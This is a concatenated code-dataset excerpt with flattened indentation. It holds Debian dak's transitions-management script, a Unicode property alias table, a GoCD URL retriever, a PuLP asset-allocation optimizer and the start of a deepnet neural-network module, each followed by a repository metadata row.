here, otherwise we just parse the file and call write_transitions
@attention: This function usually runs B{within sudo}
@type from_file: filename
@param from_file: filename of a transitions file
"""
# Lets check if from_file is in the directory we expect it to be in
if not os.path.abspath(from_file).startswith(Cnf["Dir::TempPath"]):
print "Will not accept transitions file outside of %s" % (Cnf["Dir::TempPath"])
sys.exit(3)
if Options["sudo"]:
os.spawnl(os.P_WAIT, "/usr/bin/sudo", "/usr/bin/sudo", "-u", "dak", "-H",
"/usr/local/bin/dak", "transitions", "--import", from_file)
else:
trans = load_transitions(from_file)
if trans is None:
raise TransitionsError("Unparsable transitions file %s" % (from_file))
write_transitions(trans)
################################################################################
def temp_transitions_file(transitions):
"""
Open a temporary file and dump the current transitions into it, so users
can edit them.
@type transitions: dict
@param transitions: current defined transitions
@rtype: string
@return: path of newly created tempfile
@note: NB: file is unlinked by caller, but fd is never actually closed.
We need the chmod, as the file is (most probably) copied from a
sudo-ed script and would be unreadable if it kept the default mkstemp mode
"""
(fd, path) = tempfile.mkstemp("", "transitions", Cnf["Dir::TempPath"])
os.chmod(path, 0o644)
f = open(path, "w")
yaml.safe_dump(transitions, f, default_flow_style=False)
return path
################################################################################
def edit_transitions():
""" Edit the defined transitions. """
trans_file = Cnf["Dinstall::ReleaseTransitions"]
edit_file = temp_transitions_file(load_transitions(trans_file))
editor = os.environ.get("EDITOR", "vi")
while True:
result = os.system("%s %s" % (editor, edit_file))
if result != 0:
os.unlink(edit_file)
utils.fubar("%s invocation failed for %s, not removing tempfile." % (editor, edit_file))
# Now try to load the new file
test = load_transitions(edit_file)
if test is None:
# Edit is broken
print "Edit was unparsable."
prompt = "[E]dit again, Drop changes?"
default = "E"
else:
print "Edit looks okay.\n"
print "The following transitions are defined:"
print "------------------------------------------------------------------------"
transition_info(test)
prompt = "[S]ave, Edit again, Drop changes?"
default = "S"
answer = "XXX"
while prompt.find(answer) == -1:
answer = utils.our_raw_input(prompt)
if answer == "":
answer = default
answer = answer[:1].upper()
if answer == 'E':
continue
elif answer == 'D':
os.unlink(edit_file)
print "OK, discarding changes"
sys.exit(0)
elif answer == 'S':
# Ready to save
break
else:
print "You pressed something you shouldn't have :("
sys.exit(1)
# We seem to be done and also have a working file. Copy over.
write_transitions_from_file(edit_file)
os.unlink(edit_file)
print "Transitions file updated."
################################################################################
def check_transitions(transitions):
"""
Check if the defined transitions still apply and remove those that no longer do.
@note: Asks the user for confirmation first unless -a has been set.
"""
global Cnf
to_dump = 0
to_remove = []
info = {}
session = DBConn().session()
# Now look through all defined transitions
for trans in transitions:
t = transitions[trans]
source = t["source"]
expected = t["new"]
# Will be an empty list if nothing is in testing.
sourceobj = get_source_in_suite(source, "testing", session)
info[trans] = get_info(trans, source, expected, t["rm"], t["reason"], t["packages"])
print info[trans]
if sourceobj is None:
# No package in testing
print "Transition source %s not in testing, transition still ongoing." % (source)
else:
current = sourceobj.version
compare = apt_pkg.version_compare(current, expected)
if compare < 0:
# This is still valid, the current version in database is older than
# the new version we wait for
print "This transition is still ongoing, we currently have version %s" % (current)
else:
print "REMOVE: This transition is over, the target package reached testing. REMOVE"
print "%s wanted version: %s, has %s" % (source, expected, current)
to_remove.append(trans)
to_dump = 1
print "-------------------------------------------------------------------------"
if to_dump:
prompt = "Removing: "
for remove in to_remove:
prompt += remove
prompt += ","
prompt += " Commit Changes? (y/N)"
answer = ""
if Options["no-action"]:
answer="n"
elif Options["automatic"]:
answer="y"
else:
answer = utils.our_raw_input(prompt).lower()
if answer == "":
answer = "n"
if answer == 'n':
print "Not committing changes"
sys.exit(0)
elif answer == 'y':
print "Committing"
subst = {}
subst['__SUBJECT__'] = "Transitions completed: " + ", ".join(sorted(to_remove))
subst['__TRANSITION_MESSAGE__'] = "The following transitions were removed:\n"
for remove in sorted(to_remove):
subst['__TRANSITION_MESSAGE__'] += info[remove] + '\n'
del transitions[remove]
# If we have a mail address configured for transitions,
# send a notification
subst['__TRANSITION_EMAIL__'] = Cnf.get("Transitions::Notifications", "")
if subst['__TRANSITION_EMAIL__'] != "":
print "Sending notification to %s" % subst['__TRANSITION_EMAIL__']
subst['__DAK_ADDRESS__'] = Cnf["Dinstall::MyEmailAddress"]
subst['__BCC__'] = 'X-DAK: dak transitions'
if Cnf.has_key("Dinstall::Bcc"):
subst["__BCC__"] += '\nBcc: %s' % Cnf["Dinstall::Bcc"]
message = utils.TemplateSubst(subst,
os.path.join(Cnf["Dir::Templates"], 'transition.removed'))
utils.send_mail(message)
edit_file = temp_transitions_file(transitions)
write_transitions_from_file(edit_file)
print "Done"
else:
print "WTF are you typing?"
sys.exit(0)
################################################################################
def get_info(trans, source, expected, rm, reason, packages):
"""
Print information about a single transition.
@type trans: string
@param trans: Transition name
@type source: string
@param source: Source package
@type expected: string
@param expected: Expected version in testing
@type rm: string
@param rm: Responsible RM
@type reason: string
@param reason: Reason
@type packages: list
@param packages: list of blocked packages
"""
return """Looking at transition: %s
Source: %s
New Version: %s
Responsible: %s
Description: %s
Blocked Packages (total: %d): %s
""" % (trans, source, expected, rm, reason, len(packages), ", ".join(packages))
################################################################################
def transition_info(transitions):
"""
Print information about all defined transitions.
Calls L{get_info} for every transition and then tells user if the transition is
still ongoing or if the expected version already hit testing.
@type transitions: dict
@param transitions: defined transitions
"""
session = DBConn().session()
for trans in transitions:
t = transitions[trans]
source = t["source"]
expected = t["new"]
# Will be None if nothing is in testing.
sourceobj = get_source_in_suite(source, "testing", session)
print get_info(trans, source, expected, t["rm"], t["reason"], t["packages"])
if sourceobj is None:
# No package in testing
print "Transition source %s not in testing, transition still ongoing." % (source)
else:
compare = apt_pkg.version_compare(sourceobj.version, expected)
print "Apt compare says: %s" % (compare)
if compare < 0:
# This is still valid, the current version in database is older than
# the new version we wait for
print "This transition is still ongoing, we currently have version %s" % (sourceobj.version)
else:
print "This transition is over, the target package reached testing, should be removed"
print "%s wanted version: %s, has %s" % (source, expected, sourceobj.version)
print "-------------------------------------------------------------------------"
################################################################################
def main():
"""
Prepare the work to be done, do basic checks.
@attention: This function may run B{within sudo}
"""
global Cnf
#####################################
#### This can run within sudo !! ####
#####################################
init()
# Check if there is a file defined (and existant)
transpath = Cnf.get("Dinstall::ReleaseTransitions", "")
if transpath == "":
utils.warn("Dinstall::ReleaseTransitions not defined")
sys.exit(1)
if not os.path.exists(transpath):
utils.warn("ReleaseTransitions file, %s, not found." %
(Cnf["Dinstall::ReleaseTransitions"]))
sys.exit(1)
# Also check if our temp directory is defined and existant
temppath = Cnf.get("Dir::TempPath", "")
if temppath == "":
utils.warn("Dir::TempPath not defined")
sys.exit(1)
if not os.path.exists(temppath):
utils.warn("Temporary path %s not found." %
(Cnf["Dir::TempPath"]))
sys.exit(1)
if Options["import"]:
try:
write_transitions_from_file(Options["import"])
except TransitionsError as m:
print m
sys.exit(2)
sys.exit(0)
##############################################
#### Up to here it can run within sudo !! ####
##############################################
# Parse the yaml file
transitions = load_transitions(transpath)
if transitions is None:
# Something very broken with the transitions, exit
utils.warn("Could not parse existing transitions file. Aborting.")
sys.exit(2)
if Options["edit"]:
# Let's edit the transitions file
edit_transitions()
elif Options["check"]:
# Check and remove outdated transitions
check_transitions(transitions)
else:
# Output information about the currently defined transitions.
print "Currently defined transitions:"
transition_info(transitions)
sys.exit(0)
################################################################################
if __name__ == '__main__':
main()
| gpl-2.0 | 4,832,202,560,691,502,000 | 34.210273 | 143 | 0.52913 | false |
dmilith/SublimeText3-dmilith | Packages/backrefs/st3/backrefs/uniprops/unidata/alias.py | 2 | 18637 | """Unicode Properties from Unicode version 6.1.0 (autogen)."""
unicode_alias = {
"_": {
"age": "age",
"bc": "bidiclass",
"blk": "block",
"ccc": "canonicalcombiningclass",
"dt": "decompositiontype",
"ea": "eastasianwidth",
"gc": "generalcategory",
"gcb": "graphemeclusterbreak",
"hst": "hangulsyllabletype",
"inmc": "indicmatracategory",
"insc": "indicsyllabiccategory",
"jg": "joininggroup",
"jt": "joiningtype",
"lb": "linebreak",
"nfcqc": "nfcquickcheck",
"nfdqc": "nfdquickcheck",
"nfkcqc": "nfkcquickcheck",
"nfkdqc": "nfkdquickcheck",
"nt": "numerictype",
"nv": "numericvalue",
"sb": "sentencebreak",
"sc": "script",
"scx": "scriptextensions",
"wb": "wordbreak"
},
"age": {
"unassigned": "na",
"v11": "1.1",
"v20": "2.0",
"v21": "2.1",
"v30": "3.0",
"v31": "3.1",
"v32": "3.2",
"v40": "4.0",
"v41": "4.1",
"v50": "5.0",
"v51": "5.1",
"v52": "5.2",
"v60": "6.0",
"v61": "6.1"
},
"bidiclass": {
"arabicletter": "al",
"arabicnumber": "an",
"boundaryneutral": "bn",
"commonseparator": "cs",
"europeannumber": "en",
"europeanseparator": "es",
"europeanterminator": "et",
"lefttoright": "l",
"lefttorightembedding": "lre",
"lefttorightoverride": "lro",
"nonspacingmark": "nsm",
"otherneutral": "on",
"paragraphseparator": "b",
"popdirectionalformat": "pdf",
"righttoleft": "r",
"righttoleftembedding": "rle",
"righttoleftoverride": "rlo",
"segmentseparator": "s",
"whitespace": "ws"
},
"binary": {
"ahex": "asciihexdigit",
"alpha": "alphabetic",
"bidic": "bidicontrol",
"bidim": "bidimirrored",
"blank": "posixblank",
"cased": "cased",
"ce": "compositionexclusion",
"ci": "caseignorable",
"compex": "fullcompositionexclusion",
"cwcf": "changeswhencasefolded",
"cwcm": "changeswhencasemapped",
"cwkcf": "changeswhennfkccasefolded",
"cwl": "changeswhenlowercased",
"cwt": "changeswhentitlecased",
"cwu": "changeswhenuppercased",
"dash": "dash",
"dep": "deprecated",
"di": "defaultignorablecodepoint",
"dia": "diacritic",
"ext": "extender",
"graph": "posixgraph",
"grbase": "graphemebase",
"grext": "graphemeextend",
"grlink": "graphemelink",
"hex": "hexdigit",
"hyphen": "hyphen",
"idc": "idcontinue",
"ideo": "ideographic",
"ids": "idstart",
"idsb": "idsbinaryoperator",
"idst": "idstrinaryoperator",
"joinc": "joincontrol",
"loe": "logicalorderexception",
"lower": "lowercase",
"math": "math",
"nchar": "noncharactercodepoint",
"oalpha": "otheralphabetic",
"odi": "otherdefaultignorablecodepoint",
"ogrext": "othergraphemeextend",
"oidc": "otheridcontinue",
"oids": "otheridstart",
"olower": "otherlowercase",
"omath": "othermath",
"oupper": "otheruppercase",
"patsyn": "patternsyntax",
"patws": "patternwhitespace",
"posixalpha": "alphabetic",
"posixlower": "lowercase",
"posixspace": "whitespace",
"posixupper": "uppercase",
"print": "posixprint",
"qmark": "quotationmark",
"radical": "radical",
"sd": "softdotted",
"space": "whitespace",
"sterm": "sterm",
"term": "terminalpunctuation",
"uideo": "unifiedideograph",
"upper": "uppercase",
"vs": "variationselector",
"wspace": "whitespace",
"xidc": "xidcontinue",
"xids": "xidstart"
},
"block": {
"alchemical": "alchemicalsymbols",
"alphabeticpf": "alphabeticpresentationforms",
"ancientgreekmusic": "ancientgreekmusicalnotation",
"arabicexta": "arabicextendeda",
"arabicmath": "arabicmathematicalalphabeticsymbols",
"arabicpfa": "arabicpresentationformsa",
"arabicpfb": "arabicpresentationformsb",
"arabicsup": "arabicsupplement",
"ascii": "basiclatin",
"bamumsup": "bamumsupplement",
"bopomofoext": "bopomofoextended",
"braille": "braillepatterns",
"byzantinemusic": "byzantinemusicalsymbols",
"canadiansyllabics": "unifiedcanadianaboriginalsyllabics",
"cjk": "cjkunifiedideographs",
"cjkcompat": "cjkcompatibility",
"cjkcompatforms": "cjkcompatibilityforms",
"cjkcompatideographs": "cjkcompatibilityideographs",
"cjkcompatideographssup": "cjkcompatibilityideographssupplement",
"cjkexta": "cjkunifiedideographsextensiona",
"cjkextb": "cjkunifiedideographsextensionb",
"cjkextc": "cjkunifiedideographsextensionc",
"cjkextd": "cjkunifiedideographsextensiond",
"cjkradicalssup": "cjkradicalssupplement",
"cjksymbols": "cjksymbolsandpunctuation",
"combiningmarksforsymbols": "combiningdiacriticalmarksforsymbols",
"compatjamo": "hangulcompatibilityjamo",
"countingrod": "countingrodnumerals",
"cuneiformnumbers": "cuneiformnumbersandpunctuation",
"cyrillicexta": "cyrillicextendeda",
"cyrillicextb": "cyrillicextendedb",
"cyrillicsup": "cyrillicsupplement",
"cyrillicsupplementary": "cyrillicsupplement",
"devanagariext": "devanagariextended",
"diacriticals": "combiningdiacriticalmarks",
"diacriticalsforsymbols": "combiningdiacriticalmarksforsymbols",
"diacriticalssup": "combiningdiacriticalmarkssupplement",
"domino": "dominotiles",
"enclosedalphanum": "enclosedalphanumerics",
"enclosedalphanumsup": "enclosedalphanumericsupplement",
"enclosedcjk": "enclosedcjklettersandmonths",
"enclosedideographicsup": "enclosedideographicsupplement",
"ethiopicext": "ethiopicextended",
"ethiopicexta": "ethiopicextendeda",
"ethiopicsup": "ethiopicsupplement",
"georgiansup": "georgiansupplement",
"greek": "greekandcoptic",
"greekext": "greekextended",
"halfandfullforms": "halfwidthandfullwidthforms",
"halfmarks": "combininghalfmarks",
"hangul": "hangulsyllables",
"highpusurrogates": "highprivateusesurrogates",
"idc": "ideographicdescriptioncharacters",
"indicnumberforms": "commonindicnumberforms",
"ipaext": "ipaextensions",
"jamo": "hanguljamo",
"jamoexta": "hanguljamoextendeda",
"jamoextb": "hanguljamoextendedb",
"kanasup": "kanasupplement",
"kangxi": "kangxiradicals",
"katakanaext": "katakanaphoneticextensions",
"latin1": "latin1supplement",
"latin1sup": "latin1supplement",
"latinexta": "latinextendeda",
"latinextadditional": "latinextendedadditional",
"latinextb": "latinextendedb",
"latinextc": "latinextendedc",
"latinextd": "latinextendedd",
"mahjong": "mahjongtiles",
"mathalphanum": "mathematicalalphanumericsymbols",
"mathoperators": "mathematicaloperators",
"meeteimayekext": "meeteimayekextensions",
"miscarrows": "miscellaneoussymbolsandarrows",
"miscmathsymbolsa": "miscellaneousmathematicalsymbolsa",
"miscmathsymbolsb": "miscellaneousmathematicalsymbolsb",
"miscpictographs": "miscellaneoussymbolsandpictographs",
"miscsymbols": "miscellaneoussymbols",
"misctechnical": "miscellaneoustechnical",
"modifierletters": "spacingmodifierletters",
"music": "musicalsymbols",
"myanmarexta": "myanmarextendeda",
"nb": "noblock",
"ocr": "opticalcharacterrecognition",
"phaistos": "phaistosdisc",
"phoneticext": "phoneticextensions",
"phoneticextsup": "phoneticextensionssupplement",
"privateuse": "privateusearea",
"pua": "privateusearea",
"punctuation": "generalpunctuation",
"rumi": "ruminumeralsymbols",
"smallforms": "smallformvariants",
"sundanesesup": "sundanesesupplement",
"suparrowsa": "supplementalarrowsa",
"suparrowsb": "supplementalarrowsb",
"superandsub": "superscriptsandsubscripts",
"supmathoperators": "supplementalmathematicaloperators",
"suppuaa": "supplementaryprivateuseareaa",
"suppuab": "supplementaryprivateuseareab",
"suppunctuation": "supplementalpunctuation",
"taixuanjing": "taixuanjingsymbols",
"transportandmap": "transportandmapsymbols",
"ucas": "unifiedcanadianaboriginalsyllabics",
"ucasext": "unifiedcanadianaboriginalsyllabicsextended",
"vedicext": "vedicextensions",
"vs": "variationselectors",
"vssup": "variationselectorssupplement",
"yijing": "yijinghexagramsymbols"
},
"canonicalcombiningclass": {
"a": "230",
"above": "230",
"aboveleft": "228",
"aboveright": "232",
"al": "228",
"ar": "232",
"ata": "214",
"atar": "216",
"atb": "202",
"atbl": "200",
"attachedabove": "214",
"attachedaboveright": "216",
"attachedbelow": "202",
"attachedbelowleft": "200",
"b": "220",
"below": "220",
"belowleft": "218",
"belowright": "222",
"bl": "218",
"br": "222",
"ccc10": "10",
"ccc103": "103",
"ccc107": "107",
"ccc11": "11",
"ccc118": "118",
"ccc12": "12",
"ccc122": "122",
"ccc129": "129",
"ccc13": "13",
"ccc130": "130",
"ccc133": "132",
"ccc14": "14",
"ccc15": "15",
"ccc16": "16",
"ccc17": "17",
"ccc18": "18",
"ccc19": "19",
"ccc20": "20",
"ccc21": "21",
"ccc22": "22",
"ccc23": "23",
"ccc24": "24",
"ccc25": "25",
"ccc26": "26",
"ccc27": "27",
"ccc28": "28",
"ccc29": "29",
"ccc30": "30",
"ccc31": "31",
"ccc32": "32",
"ccc33": "33",
"ccc34": "34",
"ccc35": "35",
"ccc36": "36",
"ccc84": "84",
"ccc91": "91",
"da": "234",
"db": "233",
"doubleabove": "234",
"doublebelow": "233",
"iotasubscript": "240",
"is": "240",
"kanavoicing": "8",
"kv": "8",
"l": "224",
"left": "224",
"nk": "7",
"notreordered": "0",
"nr": "0",
"nukta": "7",
"ov": "1",
"overlay": "1",
"r": "226",
"right": "226",
"virama": "9",
"vr": "9"
},
"decompositiontype": {
"can": "canonical",
"com": "compat",
"enc": "circle",
"fin": "final",
"fra": "fraction",
"init": "initial",
"iso": "isolated",
"med": "medial",
"nar": "narrow",
"nb": "nobreak",
"sml": "small",
"sqr": "square",
"sup": "super",
"vert": "vertical"
},
"eastasianwidth": {
"ambiguous": "a",
"fullwidth": "f",
"halfwidth": "h",
"narrow": "na",
"neutral": "n",
"wide": "w"
},
"generalcategory": {
"casedletter": "lc",
"closepunctuation": "pe",
"cntrl": "cc",
"combiningmark": "m",
"connectorpunctuation": "pc",
"control": "cc",
"currencysymbol": "sc",
"dashpunctuation": "pd",
"decimalnumber": "nd",
"digit": "nd",
"enclosingmark": "me",
"finalpunctuation": "pf",
"format": "cf",
"initialpunctuation": "pi",
"letter": "l",
"letternumber": "nl",
"lineseparator": "zl",
"lowercaseletter": "ll",
"mark": "m",
"mathsymbol": "sm",
"modifierletter": "lm",
"modifiersymbol": "sk",
"nonspacingmark": "mn",
"number": "n",
"openpunctuation": "ps",
"other": "c",
"otherletter": "lo",
"othernumber": "no",
"otherpunctuation": "po",
"othersymbol": "so",
"paragraphseparator": "zp",
"privateuse": "co",
"punct": "p",
"punctuation": "p",
"separator": "z",
"spaceseparator": "zs",
"spacingmark": "mc",
"surrogate": "cs",
"symbol": "s",
"titlecaseletter": "lt",
"unassigned": "cn",
"uppercaseletter": "lu"
},
"graphemeclusterbreak": {
"cn": "control",
"ex": "extend",
"pp": "prepend",
"sm": "spacingmark",
"xx": "other"
},
"hangulsyllabletype": {
"leadingjamo": "l",
"lvsyllable": "lv",
"lvtsyllable": "lvt",
"notapplicable": "na",
"trailingjamo": "t",
"voweljamo": "v"
},
"indicmatracategory": {
},
"indicsyllabiccategory": {
},
"joininggroup": {
"hamzaonhehgoal": "tehmarbutagoal"
},
"joiningtype": {
"dualjoining": "d",
"joincausing": "c",
"leftjoining": "l",
"nonjoining": "u",
"rightjoining": "r",
"transparent": "t"
},
"linebreak": {
"alphabetic": "al",
"ambiguous": "ai",
"breakafter": "ba",
"breakbefore": "bb",
"breakboth": "b2",
"breaksymbols": "sy",
"carriagereturn": "cr",
"closeparenthesis": "cp",
"closepunctuation": "cl",
"combiningmark": "cm",
"complexcontext": "sa",
"conditionaljapanesestarter": "cj",
"contingentbreak": "cb",
"exclamation": "ex",
"glue": "gl",
"hebrewletter": "hl",
"hyphen": "hy",
"ideographic": "id",
"infixnumeric": "is",
"inseparable": "in",
"inseperable": "in",
"linefeed": "lf",
"mandatorybreak": "bk",
"nextline": "nl",
"nonstarter": "ns",
"numeric": "nu",
"openpunctuation": "op",
"postfixnumeric": "po",
"prefixnumeric": "pr",
"quotation": "qu",
"space": "sp",
"surrogate": "sg",
"unknown": "xx",
"wordjoiner": "wj",
"zwspace": "zw"
},
"nfcquickcheck": {
"maybe": "m",
"no": "n",
"yes": "y"
},
"nfdquickcheck": {
"no": "n",
"yes": "y"
},
"nfkcquickcheck": {
"maybe": "m",
"no": "n",
"yes": "y"
},
"nfkdquickcheck": {
"no": "n",
"yes": "y"
},
"numerictype": {
"de": "decimal",
"di": "digit",
"nu": "numeric"
},
"numericvalue": {
},
"script": {
"arab": "arabic",
"armi": "imperialaramaic",
"armn": "armenian",
"avst": "avestan",
"bali": "balinese",
"bamu": "bamum",
"batk": "batak",
"beng": "bengali",
"bopo": "bopomofo",
"brah": "brahmi",
"brai": "braille",
"bugi": "buginese",
"buhd": "buhid",
"cakm": "chakma",
"cans": "canadianaboriginal",
"cari": "carian",
"cher": "cherokee",
"copt": "coptic",
"cprt": "cypriot",
"cyrl": "cyrillic",
"deva": "devanagari",
"dsrt": "deseret",
"egyp": "egyptianhieroglyphs",
"ethi": "ethiopic",
"geor": "georgian",
"glag": "glagolitic",
"goth": "gothic",
"grek": "greek",
"gujr": "gujarati",
"guru": "gurmukhi",
"hang": "hangul",
"hani": "han",
"hano": "hanunoo",
"hebr": "hebrew",
"hira": "hiragana",
"hrkt": "katakanaorhiragana",
"ital": "olditalic",
"java": "javanese",
"kali": "kayahli",
"kana": "katakana",
"khar": "kharoshthi",
"khmr": "khmer",
"knda": "kannada",
"kthi": "kaithi",
"lana": "taitham",
"laoo": "lao",
"latn": "latin",
"lepc": "lepcha",
"limb": "limbu",
"linb": "linearb",
"lyci": "lycian",
"lydi": "lydian",
"mand": "mandaic",
"merc": "meroiticcursive",
"mero": "meroitichieroglyphs",
"mlym": "malayalam",
"mong": "mongolian",
"mtei": "meeteimayek",
"mymr": "myanmar",
"nkoo": "nko",
"ogam": "ogham",
"olck": "olchiki",
"orkh": "oldturkic",
"orya": "oriya",
"osma": "osmanya",
"phag": "phagspa",
"phli": "inscriptionalpahlavi",
"phnx": "phoenician",
"plrd": "miao",
"prti": "inscriptionalparthian",
"qaac": "coptic",
"qaai": "inherited",
"rjng": "rejang",
"runr": "runic",
"samr": "samaritan",
"sarb": "oldsoutharabian",
"saur": "saurashtra",
"shaw": "shavian",
"shrd": "sharada",
"sinh": "sinhala",
"sora": "sorasompeng",
"sund": "sundanese",
"sylo": "sylotinagri",
"syrc": "syriac",
"tagb": "tagbanwa",
"takr": "takri",
"tale": "taile",
"talu": "newtailue",
"taml": "tamil",
"tavt": "taiviet",
"telu": "telugu",
"tfng": "tifinagh",
"tglg": "tagalog",
"thaa": "thaana",
"tibt": "tibetan",
"ugar": "ugaritic",
"vaii": "vai",
"xpeo": "oldpersian",
"xsux": "cuneiform",
"yiii": "yi",
"zinh": "inherited",
"zyyy": "common",
"zzzz": "unknown"
},
"scriptextensions": {
},
"sentencebreak": {
"at": "aterm",
"cl": "close",
"ex": "extend",
"fo": "format",
"le": "oletter",
"lo": "lower",
"nu": "numeric",
"sc": "scontinue",
"se": "sep",
"st": "sterm",
"up": "upper",
"xx": "other"
},
"wordbreak": {
"ex": "extendnumlet",
"fo": "format",
"ka": "katakana",
"le": "aletter",
"mb": "midnumlet",
"ml": "midletter",
"mn": "midnum",
"nl": "newline",
"nu": "numeric",
"xx": "other"
}
}
| mit | 8,074,594,444,167,502,000 | 29.452614 | 74 | 0.497988 | false |
greenmoss/gocd-parser | gocd_parser/retriever/url.py | 1 | 1803 | import six
from six.moves.urllib.parse import urlsplit
import logging
logger = logging.getLogger(__name__)
import requests
class URLException(Exception):
pass
class URL(object):
'''Retrieve from a Go server.'''
def __init__(self, go_server, path='', headers=None):
self.go_server = go_server
self.contents = []
full_url = go_server.url + path
logger.debug("reading url %s"%full_url)
# TODO: session would be better?
#s = requests.Session()
#if self.go_server.user and self.go_server.password:
# logger.debug("logging in as %s"%self.go_server.user)
# s.auth = (self.go_server.user, self.go_server.password)
#if headers is not None:
# s.headers.update(headers)
#r = requests.get(full_url)
if headers is None:
headers = {}
if self.go_server.user and self.go_server.password:
logger.debug("logging in as %s"%self.go_server.user)
r = requests.get(full_url, auth=(self.go_server.user,
self.go_server.password), headers=headers)
else:
r = requests.get(full_url, headers=headers)
# TODO: return r instead! Let objects just use this as is!
if r.status_code != 200:
raise URLException('Retrieval of %s failed with code %d' %
(full_url, r.status_code))
for line in r.iter_lines():
self.contents.append(line)
path_parts = urlsplit(full_url).path.split('/')
last = path_parts[-1]
# /path/to/something/
if last == '':
path_parts.pop()
last = path_parts[-1]
self.path_parts = path_parts
self.file_name = last
self.file_path = '/'.join(path_parts[0:-1])
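# Minimal usage sketch (illustrative; the Server class name is assumed, the real
# go_server object only needs url, user and password attributes):
#   server = Server('http://localhost:8153/go/', user='admin', password='secret')
#   pipelines = URL(server, path='api/pipelines.xml')
#   print('\n'.join(pipelines.contents))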
| mit | -7,048,192,591,833,760,000 | 29.05 | 79 | 0.574043 | false |
charles-difazio/asset-optimization | asset.py | 1 | 4559 | from pulp import *
from lxml import etree
import requests
prob = LpProblem("Assets", LpMinimize)
allocation = { 'stock_us' : 0.8 * 0.9 * 0.6,
'stock_intl' : 0.8 * 0.9 * 0.4,
'reit' : 0.8 * 0.1,
'bond_us' : 0.2 * 0.8,
'bond_intl' : 0.2 * 0.2 }
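# Sanity check: the target weights partition the whole portfolio,
# 0.432 + 0.288 + 0.08 + 0.16 + 0.04 = 1.0, e.g.
# assert abs(sum(allocation.values()) - 1.0) < 1e-9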
category = { 'Mid-Cap Blend' : { 'stock_us' : 1 },
'Foreign Large Blend' : { 'stock_intl' : 1 },
'Real Estate' : { 'reit' : 1 },
'Large Blend' : { 'stock_us' : 1 },
'Intermediate-Term Bond' : { 'bond_us' : 1 },
'Foreign Small/Mid Blend' : { 'stock_intl' : 1 },
'Small Value' : { 'stock_us' : 1 },
'World Bond' : { 'bond_intl' : 1 }
}
assets = {'401k' : { 'VEMPX' : 1000,
'VTPSX' : 1000,
'VGSNX' : 1000,
'VIIIX' : 1000,
'VBMPX' : 1000 },
'ira' : { 'VTIAX' : 1000,
'VTSAX' : 1000,
'VGSLX' : 1000,
'VTABX' : 1000 },
'personal' : { 'VTSAX' : 1000,
'VFWAX' : 1000 } }
funds = {}
for accounts in assets.keys():
for fund in assets[accounts].keys():
funds[fund] = {}
# Lookup current prices
for fund in funds.keys():
params = { 't' : 'XNAS:' + fund, 'region' : 'usa', 'culture' : 'en-US',
'cur' : 'USD'}
r = requests.get('http://quotes.morningstar.com/fund/c-header',
params=params)
tree = etree.fromstring(r.text, etree.HTMLParser())
funds[fund]['price'] = float(tree.xpath(
"//span[@vkey='NAV']/text()")[0].strip())
funds[fund]['er'] = float(tree.xpath(
"//span[@vkey='ExpenseRatio']/text()")[0].strip().rstrip('%'))
composition = category[tree.xpath(
"//span[@vkey='MorningstarCategory']/text()")[0].strip()]
funds[fund]['composition'] = composition
print fund, '@', funds[fund]['price'], funds[fund]['er']
account_value = {}
for account in assets.keys():
account_value[account] = sum([ shares * funds[fund]['price']
for (fund, shares)
in assets[account].items() ])
print '%s value: %0.2f' % (account, account_value[account])
v_total = sum(account_value.values())
ideal_value = {}
for asset_class in allocation.keys():
ideal_value[asset_class] = allocation[asset_class] * v_total
shares = {}
for account in assets.keys():
shares[account] = {}
for fund in assets[account]:
shares[account][fund] = LpVariable(account + ':' + fund, 0, None)
# Minimize average expense ratio
prob += (sum([funds[x]['er'] * funds[x]['price'] * shares['401k'][x] for x in
shares['401k'].keys()]) +
sum([funds[x]['er'] * funds[x]['price'] * shares['ira'][x] for x in
shares['ira'].keys()]) +
sum([funds[x]['er'] * funds[x]['price'] * shares['personal'][x] for x in
shares['personal'].keys()]))
# Total account values are fixed
for account in account_value.keys():
prob += (sum([funds[x]['price'] * shares[account][x] for x in
shares[account].keys()]) == account_value[account])
# Use VIIIX and VEMPX to approximate total market
prob += (0.18 * funds['VIIIX']['price'] * shares['401k']['VIIIX'] -
0.82 * funds['VEMPX']['price'] * shares['401k']['VEMPX'] == 0)
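# i.e. hold VIIIX and VEMPX at an 82/18 value ratio, a rough S&P 500 plus
# extended-market approximation of the total US stock market.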
# Set up the asset allocation constraints for a given account and asset class
def asset_class_allocation_constraints(account, asset_class):
return sum([funds[fund]['composition'][asset_class] *
funds[fund]['price'] *
shares[account][fund] for fund in shares[account].keys()
if asset_class in funds[fund]['composition']])
# Ensure individual asset allocations
for asset_class in allocation.keys():
prob += (sum([
asset_class_allocation_constraints(account, asset_class)
for account in assets.keys() ]) ==
ideal_value[asset_class])
# Admiral minima + 10%
prob += (funds['VTSAX']['price'] * shares['ira']['VTSAX'] >= 11000)
prob += (funds['VGSLX']['price'] * shares['ira']['VGSLX'] >= 11000)
prob += (funds['VFWAX']['price'] * shares['personal']['VFWAX'] >= 11000)
prob.solve()
print "Status: ", LpStatus[prob.status]
for v in prob.variables():
print "%s: %f ($%0.2f)" % (v.name, v.varValue, funds[v.name.split(':')[1]]['price'] * v.varValue)
print "Total cost", value(prob.objective)/v_total
| apache-2.0 | 2,496,520,912,736,537,600 | 37.635593 | 101 | 0.528844 | false |
elkingtowa/nn | deepnet/neuralnet.py | 9 | 24100 | """Implements a feed-forward neural net."""
import gzip
import logging
import sys
import time
from google.protobuf import text_format
from datahandler import *
from convolutions import *
from edge import *
from layer import *
from util import *
from logistic_layer import *
from tanh_layer import *
from relu_layer import *
from smooth_relu_layer import *
from linear_layer import *
from softmax_layer import *
from replicated_softmax_layer import *
from cos_layer import *
from sin_layer import *
from transfer_edge import *
from soft_transfer_edge import *
class NeuralNet(object):
def __init__(self, net, t_op=None, e_op=None):
self.net = None
if isinstance(net, deepnet_pb2.Model):
self.net = net
elif isinstance(net, str) or isinstance(net, unicode):
self.net = ReadModel(net)
self.t_op = None
if isinstance(t_op, deepnet_pb2.Operation):
self.t_op = t_op
elif isinstance(t_op, str) or isinstance(t_op, unicode):
self.t_op = ReadOperation(t_op)
self.e_op = None
if isinstance(e_op, deepnet_pb2.Operation):
self.e_op = e_op
elif isinstance(e_op, str) or isinstance(e_op, unicode):
self.e_op = ReadOperation(e_op)
cm.CUDAMatrix.init_random(self.net.seed)
np.random.seed(self.net.seed)
self.data = None
self.layer = []
self.edge = []
self.input_datalayer = []
self.output_datalayer = []
self.datalayer = []
self.tied_datalayer = []
self.unclamped_layer = []
self.verbose = False
self.batchsize = 0
if self.t_op:
self.verbose = self.t_op.verbose
self.batchsize = self.t_op.batchsize
elif self.e_op:
self.verbose = self.e_op.verbose
